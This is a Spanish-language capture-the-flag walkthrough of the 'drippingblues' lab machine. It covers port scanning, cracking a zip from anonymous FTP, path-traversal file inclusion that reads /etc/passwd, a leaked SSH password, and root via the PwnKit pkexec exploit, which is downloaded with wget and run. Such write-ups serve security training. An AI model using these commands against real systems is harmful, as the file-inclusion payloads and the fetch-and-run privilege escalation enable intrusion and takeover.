Enumeramos puertos:
❯ sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.22
❯ nmap -sCV -p21,22,80 -oN 02-targeted.txt 192.168.1.22
Starting Nmap 7.94 ( https://nmap.org ) at 2024-05-27 22:55 -04
Nmap scan report for 192.168.1.22
Host is up (0.00027s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip [NSE: writeable]
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/dripisreal.txt /etc/dripispowerful.html
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelPor FTP anónimo descargamos respectmydrip.zip (cifrado), que crackeamos con john:
❯ zip2john zip_files/respectmydrip.zip > hash
❯ /opt/john/run/john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
072528035 (respectmydrip.zip/respectmydrip.txt)
...Fuzzeando index.php encontramos el parámetro drip, vulnerable a LFI:
❯ ffuf -u 'http://192.168.1.22/index.php?FUZZ=../../../../../../etc/passwd' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -fw 13
...
drip [Status: 200, ...]
...
❯ curl http://192.168.1.22/index.php\?drip\=/etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
thugger:x:1001:1001:,,,:/home/thugger:/bin/bashLeyendo el archivo del robots.txt obtenemos la contraseña SSH:
❯ curl "http://192.168.1.22/index.php?drip=/etc/dripispowerful.html"
...
password is:
imdrippinbiatch
...
❯ ssh thugger@192.168.1.22
thugger@192.168.1.22's password: imdrippinbiatch
thugger@drippingblues:~$Obtenemos la primera flag. Buscamos binarios SUID y encontramos pkexec:
thugger@drippingblues:/tmp$ find / -perm -4000 2>/dev/null
...
/usr/bin/pkexec
...Explotamos PwnKit:
thugger@drippingblues:/tmp$ wget -O PwnKit https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit
thugger@drippingblues:/tmp$ chmod +x PwnKit
thugger@drippingblues:/tmp$ ./PwnKit
root@drippingblues:/tmp#Obtenemos nuestra flag.
Fin.